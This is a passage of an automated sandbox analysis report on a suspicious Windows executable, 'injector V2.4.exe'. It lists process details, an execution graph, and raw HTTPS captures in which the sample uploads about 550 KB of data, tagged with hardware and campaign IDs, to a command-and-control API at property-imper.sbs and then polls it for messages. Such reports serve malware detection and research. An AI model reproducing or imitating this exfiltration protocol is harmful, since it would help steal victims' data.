                                                                                  Date: Sat, 23 Nov 2024 13:11:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=6e9t6dqgv6h4nifftdjo368k63; expires=Wed, 19-Mar-2025 06:58:02 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2ByjO6ZLRkM9HTe0H0SqUkD3Rt2%2BT2NrAEvB8oBc88nJ%2FQKCbpVVu8Zee%2FgFlptKbzz4HKmYVs%2BDU6xoLVQbFhP5RuqBLxmUMeDuA%2BqeP2PrOx5TdEE9pDgezRp8X%2B1QhTs2x0o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e7167a2290b4249-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2038&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2166&delivery_rate=1430671&cwnd=225&unsent_bytes=0&cid=4d172fb739f3a8e5&ts=734&x=0"
                                                                                  2024-11-23 13:11:23 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 13:11:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549711104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:25 UTC286OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=Z4LE82AH15EL844SF6X
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 551200
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 2d 2d 5a 34 4c 45 38 32 41 48 31 35 45 4c 38 34 34 53 46 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 36 42 39 39 44 41 43 45 33 32 45 35 36 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 5a 34 4c 45 38 32 41 48 31 35 45 4c 38 34 34 53 46 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 34 4c 45 38 32 41 48 31 35 45 4c 38 34 34 53 46 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 32
                                                                                  Data Ascii: --Z4LE82AH15EL844SF6XContent-Disposition: form-data; name="hwid"C16B99DACE32E567C8852029FBE145BA--Z4LE82AH15EL844SF6XContent-Disposition: form-data; name="pid"1--Z4LE82AH15EL844SF6XContent-Disposition: form-data; name="lid"yau6Na--12
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 38 2a 6f 2c b7 f2 1a 4d 4c 0d 31 d8 28 de b3 eb e9 5f a5 9b 60 12 8c 4e 74 9e a5 46 7a c6 f2 6d c3 dd 39 90 86 a2 94 bf c9 22 2e 0c 5f 8e 2e ad c9 0f 94 9a 0b 60 bf d0 5e 11 07 ef 94 5b aa 8d 9a 96 a2 bf e3 ce f9 99 3d 51 8c 97 dd fa 25 4b 4e f1 96 bd b1 e3 69 fe 96 56 8f c7 7d 5f 81 45 1d c9 84 ee 1f c2 28 03 b3 d1 2a fe 85 22 a9 71 59 89 c2 34 4b 17 e8 52 aa 64 dc 5a 26 8b 32 24 7a a9 22 71 3c 23 82 64 6d da ee 2b 5b f1 a8 16 96 90 94 dc ce 50 8e 84 85 12 bd 59 b3 d3 bb 05 c1 b2 10 23 99 5a 74 1a 17 68 8f a6 96 6c 75 3a 3e 4d ae f4 78 8e 87 bd a0 0a 11 a9 b4 4f 10 3d 46 9a 95 1e 05 a5 4e 38 33 74 f1 2c 91 e6 cb 07 99 0e b0 23 77 91 5d a7 80 5a e5 07 f4 25 91 ad 9d 68 78 4e bb 15 30 8b 42 2a f9 50 a0 be f4 58 91 15 6c bd 65 e4 2a 64 b7 76 4f aa e9 39 d3
                                                                                  Data Ascii: 8*o,ML1(_`NtFzm9"._.`^[=Q%KNiV}_E(*"qY4KRdZ&2$z"q<#dm+[PY#Zthlu:>MxO=FN83t,#w]Z%hxN0B*PXle*dvO9
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 49 3e 76 33 af 37 71 9f 9f cf cf 0f af 6f 68 b1 ef 71 b5 eb 0d 08 ae da 8b 32 86 f5 cd 8c 87 f9 10 df bc f4 fc 95 19 ab 81 50 7e 62 50 a0 15 cd 21 5b b5 5b 8b cf 53 92 3c f4 2b b5 19 92 67 c8 ff 79 44 1c 55 ad d0 90 78 60 20 50 17 af 2e 29 77 c1 3a 53 a8 3a 3c fc e0 38 ad 71 dd 34 21 73 be 8b cd 34 ac 50 fb 66 68 3d f3 22 4d 64 5c 96 fb 7a 1b f1 96 91 2e ee a0 6d 42 eb a5 07 af 95 bd 48 bd 84 43 23 f5 d6 35 27 ab 4f 23 b2 7f c3 a2 ab e2 af a6 b2 5b fe 1b 03 ae f4 14 87 80 d9 82 49 cd 2e bb 47 bc 6f 95 1c d7 bb 6c 03 4f 94 e0 39 e0 37 f0 7d eb 2f de cf 7f b3 da e6 b9 cc ea 65 db a1 8d 0b 77 3b 2f ba bc 76 e4 35 89 fc 70 0b 76 0f d8 a8 b4 5f bf a4 eb ce 9d 0f 5a 52 6f ff f9 a7 0a 9a ae 0a d2 42 19 85 c2 15 86 10 75 e2 d1 67 fd e7 86 dc b5 9d 32 9c 25 c0 42
                                                                                  Data Ascii: I>v37qohq2P~bP![[S<+gyDUx` P.)w:S:<8q4!s4Pfh="Md\z.mBHC#5'O#[I.GolO97}/ew;/v5pv_ZRoBug2%B
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 5d b1 a1 73 22 ca f1 51 47 85 df e1 ad e0 9c 64 1e c0 94 ba c4 12 08 ba 6c 30 78 01 f5 20 6c 31 17 c3 95 02 4c ff 99 ca 8a 14 f6 5b 21 14 8a 5b e2 95 ed df 49 74 80 c3 03 fd 54 3e ef 15 48 7d 4d 21 74 2f 1a c9 d9 a9 15 87 dd 20 46 9d 39 2f 3a 42 7b f7 af 89 d9 7b b7 be 7a 14 01 90 15 bd ba 64 d2 94 23 26 95 ba d1 8c ee 4b b3 48 75 22 8e 22 0b fe 4f 8f 90 ff 76 f7 a7 fe bd b2 4b ff 17 84 80 a3 69 90 d6 44 88 79 2d 01 64 7b 7a 72 3c fd 40 bd eb 8e 83 af 42 02 9b fd d0 e4 07 b0 ab 58 b4 34 bc d9 29 b0 78 17 90 3d ad c0 e8 fc 67 bf fe c8 56 cc 7a 18 58 93 e4 0a 2b 2d da 01 f8 cb e0 bb e1 4a ef f5 87 55 95 bf e7 2e e7 e9 79 b7 a3 cf 0b 60 4b ac d4 18 c9 86 40 81 40 f3 38 29 a8 9d a3 31 95 d1 13 9f c3 78 d5 e1 a4 8b a6 a5 59 20 a9 e6 c5 96 4d e1 f4 60 0d 5c 50
                                                                                  Data Ascii: ]s"QGdl0x l1L[![ItT>H}M!t/ F9/:B{{zd#&KHu""OvKiDy-d{zr<@BX4)x=gVzX+-JU.y`K@@8)1xY M`\P
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 75 15 1c 33 18 eb bc 17 bb b6 8f 54 d6 64 41 46 58 39 18 12 60 e3 06 4d 5b 83 9e 3c a2 f4 b6 e9 8c 09 ec 3f 31 67 55 4c 1d c5 9c cb 8b da 95 14 42 c3 9f a3 b8 0a 5a f6 0a 55 79 5f 4b 95 86 b5 bb df 36 91 14 38 5b 7a f3 e3 48 39 12 eb e3 e7 b7 1f 12 6a e8 34 e6 5e c3 41 d0 c6 56 52 71 93 23 84 86 b0 d0 0a 7e 15 ac 13 b3 f7 92 68 8f ed b7 b1 87 53 50 95 fc c3 84 17 f9 cd ef ea e7 ae 2f 84 c7 5e eb 3b 10 d4 86 cf 8b 0a df 01 d4 43 e9 49 c2 ae ce a9 3e 42 e7 00 f2 c8 ab 94 07 93 51 e4 68 2f e8 9d 42 02 20 0c 40 7e fb 7b ff 36 1e 88 5a 3d 8a 93 16 6e c8 d8 d5 5c 17 c6 cf 2f c5 fe 25 2e a6 80 15 39 40 5f 0e 6c 15 aa da 84 4b 3d 3f be 36 2c 67 c4 b1 1e dd 88 a8 70 51 08 e5 07 3f 3d 64 6e b4 9c c6 c2 de 7f 3c 8f 56 39 a5 28 b4 d4 45 f2 03 8b 45 e0 9f 9b d6 6c 79
                                                                                  Data Ascii: u3TdAFX9`M[<?1gULBZUy_K68[zH9j4^AVRq#~hSP/^;CI>BQh/B @~{6Z=n\/%.9@_lK=?6,gpQ?=dn<V9(EEly
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 40 c5 2d 6a 2c f3 73 5b 37 2a 60 4c 18 b1 6e 21 34 10 92 8e 81 29 5c 08 5b 6d c3 78 df 37 34 0a f4 2f 8d 71 24 2d e8 32 40 5f eb cf be 63 86 cd 32 da bc 86 a5 1f 18 f0 69 83 f9 f3 8d eb c2 86 3f 55 f2 43 04 af e8 14 36 ab 09 76 96 ce f7 47 c6 18 9e 47 f6 f3 ba a4 37 14 f8 7c ce ca 71 97 0e 43 b5 f5 9b 26 a8 44 81 f9 f9 5b c2 d3 5f 01 3d fe d3 7c e9 0d 76 3a a0 94 42 70 a6 f7 11 e4 e6 11 5e 61 0e df 06 7a f5 73 2d 16 8e f5 db 72 e2 b5 cf 95 fe c9 46 07 8a c0 68 35 52 a8 80 91 56 5c 75 c6 b7 79 0b 16 5c d9 f0 3f 2d 0d 29 49 20 44 26 f1 db 37 17 10 7c e2 a7 45 be 13 c7 77 52 aa 01 41 f1 ea c6 f3 01 59 f8 17 1a d8 43 83 58 40 96 95 f8 46 a2 8b 41 74 8b 73 02 69 38 b0 07 a5 f0 fb 10 dd 8b 40 d8 ef 09 ca 6e 20 f9 a2 53 03 01 1f ff 03 ef da 7b e5 cb 79 27 ac 2b
                                                                                  Data Ascii: @-j,s[7*`Ln!4)\[mx74/q$-2@_c2i?UC6vGG7|qC&D[_=|v:Bp^azs-rFh5RV\uy\?-)I D&7|EwRAYCX@FAtsi8@n S{y'+
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 2d 9e f3 cb b0 cc b3 b0 31 bd 84 38 85 7d fb fa 94 e1 5a d4 6b 5b b9 85 1d bd 85 ec 74 66 87 4a 97 01 a8 dd 58 fd a3 08 a2 56 52 15 7f f0 42 9a 56 9e 95 84 ac af 05 fe c9 a6 d0 42 c6 5a fc 78 dc 8d 1f ad d4 d5 f2 f3 68 ea 00 cf 97 67 bb 5c 11 9e ad a4 47 ac d9 73 21 66 2d f3 c8 d2 bf 87 8f 2c ad b3 a8 86 af 7a fb 43 3e 86 b7 03 a7 56 6e 8d 37 47 ff ea e8 7f 53 5b 59 63 80 71 f7 48 c8 4a bf 1c 10 07 5e 9e ff b7 22 54 db 90 cf eb b6 a8 ff d9 93 b2 16 67 bf ba bd f3 49 e4 56 4d 7b a0 42 52 86 95 e9 de 25 27 a6 c3 97 90 3a 26 f8 d4 06 25 d4 d1 64 ac b3 80 c0 e5 de a8 d2 5d a4 96 6f e8 97 ff ff 5a c1 e0 e0 cd 55 a3 57 40 5b 3c 5d 1c 64 49 a3 95 f4 c1 31 6c 71 5b a9 86 c8 b7 fb 70 c4 d1 79 83 08 ee 56 07 1c 24 b9 7e d2 48 5b 06 c0 93 eb bf d4 eb bd 85 28 5a d1
                                                                                  Data Ascii: -18}Zk[tfJXVRBVBZxhg\Gs!f-,zC>Vn7GS[YcqHJ^"TgIVM{BR%':&%d]oZUW@[<]dI1lq[pyV$~H[(Z
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 9f 97 13 39 12 73 80 7c 18 4f f3 15 de 7b 00 17 97 68 0f 12 5a ee d3 d2 c4 eb 67 5f fe e6 b8 6c d4 9a ac fc ae 3d 29 e1 1c 04 1d 23 7d d8 dd 55 f7 23 b1 0b ab c4 a4 3d 59 54 6c 76 90 6f fc e3 7f b2 51 e0 35 ab 6b 6f b1 73 26 c7 c7 ff 2c 4d bd f3 a8 34 71 4c fd 69 d5 18 79 ad 6a 4b 7c 41 6c cc ab 02 06 2c 4a e3 d9 76 f1 8a e9 a4 be f4 7e f3 27 1f 14 c6 fc f3 34 c4 2d de fd 6a 9d 1c 0f a7 c6 0f 52 be 5b 9e 7b 52 1e 24 2b 7e ac 2e 23 88 70 ca c1 ab ea 17 c9 43 63 67 66 21 36 20 fe fd 4f c8 e7 49 98 83 b8 39 18 05 3c a5 e9 75 0d 4e ce 19 d5 96 e2 60 7a 1b af 65 4f 7c 98 60 7f 6c 30 71 51 ee 37 34 77 34 a4 3c 0f 08 46 14 d6 72 ec bf 11 4e ab 1a 61 e5 de dc 72 29 a8 0d 42 12 4d 6c f4 58 7f a1 fe ca 44 97 45 d0 14 e2 97 a7 ed 8e 0f 12 a6 7e c1 47 4a f7 b4 8f 3e
                                                                                  Data Ascii: 9s|O{hZg_l=)#}U#=YTlvoQ5kos&,M4qLiyjK|Al,Jv~'4-jR[{R$+~.#pCcgf!6 OI9<uN`zeO|`l0qQ74w4<FrNar)BMlXDE~GJ>
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 23 b6 05 71 de 5d 01 69 99 64 2d fe 4f 83 d4 1a 83 70 a7 53 ac 0e 54 6e 53 07 d9 d7 1b 37 d6 fe 76 9e a3 35 a7 97 78 d0 d2 44 dc 71 98 30 76 f2 31 79 6d c8 b2 f4 c8 a6 3f 88 87 34 e9 76 7e 6d 4a 13 51 7a f1 40 b5 99 fb ea b6 65 f2 24 34 0f 66 08 42 4a 97 2c df 9f 84 e2 d7 ac 61 53 9e bf f1 74 93 ab 6e 67 8e a9 be 4b 42 6a ca d3 ea 04 f9 9f 96 f5 a7 a4 2f 92 ae 55 7f a8 52 9d 71 1d b1 55 22 f0 eb fa 49 69 50 76 1e 15 65 11 65 69 66 ed ac e9 a9 66 99 a1 83 3b 34 ba df 32 96 b1 09 64 07 60 e5 95 6a 03 76 b7 3c bd 16 2c 0a 92 e3 a4 a3 2c 62 63 c2 6b 77 47 b4 a6 f7 46 42 99 2b c1 ff f3 7a 88 ec 7f bf 5e 32 bd dd ff 40 1c 64 e1 30 ff 9f 03 34 45 a6 db 62 e1 7b b1 f9 0a a7 3b af 59 7f 8e df 24 53 35 41 ad a6 96 a0 6d 8f ed 92 53 8d b6 7f 8f 55 32 a2 7f 1f e2 48
                                                                                  Data Ascii: #q]id-OpSTnS7v5xDq0v1ym?4v~mJQz@e$4fBJ,aStngKBj/URqU"IiPveeiff;42d`jv<,,bckwGFB+z^2@d04Eb{;Y$S5AmSU2H
                                                                                  2024-11-23 13:11:25 UTC15331OUTData Raw: 25 65 a1 4f 2a c6 2a b7 ad a6 94 b8 26 6c 7b 79 93 b5 19 d2 22 2e 11 66 08 a2 8d 93 a3 c6 88 e9 4c 7c f6 c8 e1 79 80 68 04 7c 5c 1a d9 10 29 4b f1 4c 41 db c5 65 f6 3e 8d 26 55 9b 51 34 d8 34 a7 0f 86 8a 7d 1e 38 09 b3 54 d3 f0 13 8e 80 69 db a5 06 6b ec bc fc c7 0c 5a 92 26 c8 80 0b 5b 93 33 0f 32 33 83 b8 f7 fe f5 76 6a b4 88 74 60 a4 63 e3 9f 6e 94 fa bc 3a aa b0 11 d3 f0 a4 ca e7 84 fc e4 fb 15 bf 2d 54 f3 5a a6 18 f4 d7 97 6a 55 f9 a5 f2 bd c2 6f be 54 63 ff 23 0c bc 39 68 51 5a a2 43 81 c3 4f c7 fb 92 d9 e9 51 e6 5d b2 52 97 bb ab ad 08 7a 4d c6 60 94 88 99 28 3c 74 2a cf d0 3d ee 7d dd 59 5a 4f a1 e9 c7 5a 38 e8 2c 6d ab f8 a6 7f 79 3f 16 b3 78 70 f0 af 0a 3f 09 2a 69 78 48 95 6e 1b 13 bb 46 f9 6c b4 5e ef 60 d8 92 59 f5 1e 95 e9 03 9f c2 21 d4 c5
                                                                                  Data Ascii: %eO**&l{y".fL|yh|\)KLAe>&UQ44}8TikZ&[323vjt`cn:-TZjUoTc#9hQZCOQ]RzM`(<t*=}YZOZ8,my?xp?*ixHnFl^`Y!
                                                                                  2024-11-23 13:11:28 UTC1023INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=57m0plrjd09c1c9godfoq3ks1m; expires=Wed, 19-Mar-2025 06:58:07 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2B2UNUtnmrkFuvre19B6LFphASun%2B0Bi1KkzP0tSZYb1jrKNseVukykq55wsoy4JQK1V25xGd5VGhA5RWYcKu8kVNIrW7qmZq0omVahxtVaFz7DAqIH3E%2BTuJUZk%2BBI0HF3ZNME%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e7167b1e9e4c425-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=337&recv=518&lost=0&retrans=0&sent_bytes=2845&recv_bytes=553684&delivery_rate=1760096&cwnd=239&unsent_bytes=0&cid=af4e44fbfce289bb&ts=2940&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.549725104.21.33.1164436564C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 13:11:30 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 87
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 13:11:30 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 32 38 35 30 32 35 37 30 35 26 6a 3d 26 68 77 69 64 3d 43 31 36 42 39 39 44 41 43 45 33 32 45 35 36 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41
                                                                                  Data Ascii: act=get_message&ver=4.0&lid=yau6Na--1285025705&j=&hwid=C16B99DACE32E567C8852029FBE145BA
                                                                                  2024-11-23 13:11:30 UTC1017INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 13:11:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=6mefi20bo3f0d9jlrgo37aco71; expires=Wed, 19-Mar-2025 06:58:09 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AnkfBs%2BwTq6TzRb9%2BBEtShFLhJT9KxcDM8y1qbsfe%2FdIQYZ23d6Jk07PDrkzuyRr0RrPKGKxwOSt35ymQoKRHU4%2FdWPF%2FcrL0sACQZQrrpAmMfUfbBjnH3SzsOGd3ZYKwXrGcJI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e7167ceff264396-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=989&delivery_rate=1688837&cwnd=252&unsent_bytes=0&cid=8a8bd6eaeca7ff2b&ts=718&x=0"
                                                                                  2024-11-23 13:11:30 UTC54INData Raw: 33 30 0d 0a 49 42 4b 68 51 65 52 31 69 45 54 2b 62 78 56 56 35 36 30 66 63 69 6f 44 56 4d 41 76 62 6a 44 71 41 44 38 59 37 39 66 30 4d 4e 42 37 54 77 3d 3d 0d 0a
                                                                                  Data Ascii: 30IBKhQeR1iET+bxVV560fcioDVMAvbjDqAD8Y79f0MNB7Tw==
                                                                                  2024-11-23 13:11:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:08:11:08
                                                                                  Start date:23/11/2024
                                                                                  Path:C:\Users\user\Desktop\injector V2.4.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\injector V2.4.exe"
                                                                                  Imagebase:0x4c0000
                                                                                  File size:491'520 bytes
                                                                                  MD5 hash:C1B5CAE419A07B5BFEB4E958510F8637
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:08:11:08
                                                                                  Start date:23/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:08:11:09
                                                                                  Start date:23/11/2024
                                                                                  Path:C:\Users\user\Desktop\injector V2.4.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\injector V2.4.exe"
                                                                                  Imagebase:0x4c0000
                                                                                  File size:491'520 bytes
                                                                                  MD5 hash:C1B5CAE419A07B5BFEB4E958510F8637
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:08:11:09
                                                                                  Start date:23/11/2024
                                                                                  Path:C:\Users\user\Desktop\injector V2.4.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\injector V2.4.exe"
                                                                                  Imagebase:0x4c0000
                                                                                  File size:491'520 bytes
                                                                                  MD5 hash:C1B5CAE419A07B5BFEB4E958510F8637
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:4.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:7.5%
                                                                                    Total number of Nodes:1908
                                                                                    Total number of Limit Nodes:27
                                                                                    execution_graph 8844 4dbc45 8845 4dbc83 8844->8845 8850 4dbc53 _unexpected 8844->8850 8846 4db757 __dosmaperr 14 API calls 8845->8846 8848 4dbc81 8846->8848 8847 4dbc6e RtlAllocateHeap 8847->8848 8847->8850 8849 4d7207 _unexpected 2 API calls 8849->8850 8850->8845 8850->8847 8850->8849 8933 4d56e2 8934 4d56ee ___scrt_is_nonwritable_in_current_image 8933->8934 8959 4d508f 8934->8959 8936 4d584e 8998 4d5444 IsProcessorFeaturePresent 8936->8998 8938 4d5855 8940 4d585b 8938->8940 8941 4d6ed5 21 API calls 8938->8941 8939 4d56f5 8939->8936 8946 4d571f ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 8939->8946 9002 4d6eeb 8940->9002 8941->8940 8944 4d573e 8945 4d57bf 8970 4d7a56 8945->8970 8946->8944 8946->8945 8983 4d6f1f 8946->8983 8949 4d57c5 8974 4ccd90 8949->8974 8952 4d53ec __FrameHandler3::FrameUnwindToState GetModuleHandleW 8953 4d57e6 8952->8953 8953->8938 8954 4d57ea 8953->8954 8955 4d57f3 8954->8955 8989 4d6f01 8954->8989 8992 4d50c8 8955->8992 8960 4d5098 8959->8960 9005 4d5200 IsProcessorFeaturePresent 8960->9005 8964 4d50a9 8969 4d50ad 8964->8969 9015 4d6a60 8964->9015 8967 4d50c4 8967->8939 8969->8939 8971 4d7a5f 8970->8971 8972 4d7a64 8970->8972 9087 4d7b7f 8971->9087 8972->8949 9835 4cce30 8974->9835 8981 4d4241 TranslatorGuardHandler 5 API calls 8982 4cce24 8981->8982 8982->8952 8984 4d6f35 ___scrt_is_nonwritable_in_current_image _unexpected 8983->8984 8984->8945 8985 4da00a _unexpected 48 API calls 8984->8985 8988 4d847c 8985->8988 8986 4d835d __FrameHandler3::FrameUnwindToState 48 API calls 8987 4d84a6 8986->8987 8988->8986 8990 4d7020 __FrameHandler3::FrameUnwindToState 21 API calls 8989->8990 8991 4d6f0c 8990->8991 8991->8955 8993 4d50d4 8992->8993 8997 4d50ea 8993->8997 10222 4d6a72 8993->10222 8995 4d50e2 8996 4d60ca ___scrt_uninitialize_crt 7 API calls 8995->8996 8996->8997 8997->8944 8999 4d545a __FrameHandler3::FrameUnwindToState std::bad_exception::bad_exception 8998->8999 9000 4d5505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8999->9000 9001 4d5550 __FrameHandler3::FrameUnwindToState 9000->9001 9001->8938 9003 4d7020 __FrameHandler3::FrameUnwindToState 21 API calls 9002->9003 9004 4d5863 9003->9004 9006 4d50a4 9005->9006 9007 4d60ab 9006->9007 9024 4d9706 9007->9024 9010 4d60b4 9010->8964 9012 4d60bc 9013 4d60c7 9012->9013 9038 4d9742 9012->9038 9013->8964 9078 4db105 9015->9078 9018 4d60ca 9019 4d60dd 9018->9019 9020 4d60d3 9018->9020 9019->8969 9021 4d8811 ___vcrt_uninitialize_ptd 6 API calls 9020->9021 9022 4d60d8 9021->9022 9023 4d9742 ___vcrt_uninitialize_locks DeleteCriticalSection 9022->9023 9023->9019 9026 4d970f 9024->9026 9027 4d9738 9026->9027 9028 4d60b0 9026->9028 9042 4ddc17 9026->9042 9029 4d9742 ___vcrt_uninitialize_locks DeleteCriticalSection 9027->9029 9028->9010 9030 4d87de 9028->9030 9029->9028 9059 4ddb28 9030->9059 9033 4d87f3 9033->9012 9036 4d880e 9036->9012 9039 4d976c 9038->9039 9040 4d974d 9038->9040 9039->9010 9041 4d9757 DeleteCriticalSection 9040->9041 9041->9039 9041->9041 9047 4ddca9 9042->9047 9045 4ddc4f InitializeCriticalSectionAndSpinCount 9046 4ddc3a 9045->9046 9046->9026 9048 4ddc31 9047->9048 9049 4ddcca 9047->9049 9048->9045 9048->9046 9049->9048 9050 4ddd32 GetProcAddress 9049->9050 9052 4ddd23 9049->9052 9054 4ddc5e LoadLibraryExW 9049->9054 9050->9048 9052->9050 9053 4ddd2b FreeLibrary 9052->9053 9053->9050 9055 4ddc75 GetLastError 9054->9055 9056 4ddca5 9054->9056 9055->9056 9057 4ddc80 ___vcrt_FlsGetValue 9055->9057 9056->9049 9057->9056 9058 4ddc96 LoadLibraryExW 9057->9058 9058->9049 9060 4ddca9 ___vcrt_FlsGetValue 5 API calls 9059->9060 9061 4ddb42 9060->9061 9062 4ddb5b TlsAlloc 9061->9062 9063 4d87e8 9061->9063 9063->9033 9064 4ddbd9 9063->9064 9065 4ddca9 ___vcrt_FlsGetValue 5 API calls 9064->9065 9066 4ddbf3 9065->9066 9067 4ddc0e TlsSetValue 9066->9067 9068 4d8801 9066->9068 9067->9068 9068->9036 9069 4d8811 9068->9069 9070 4d8821 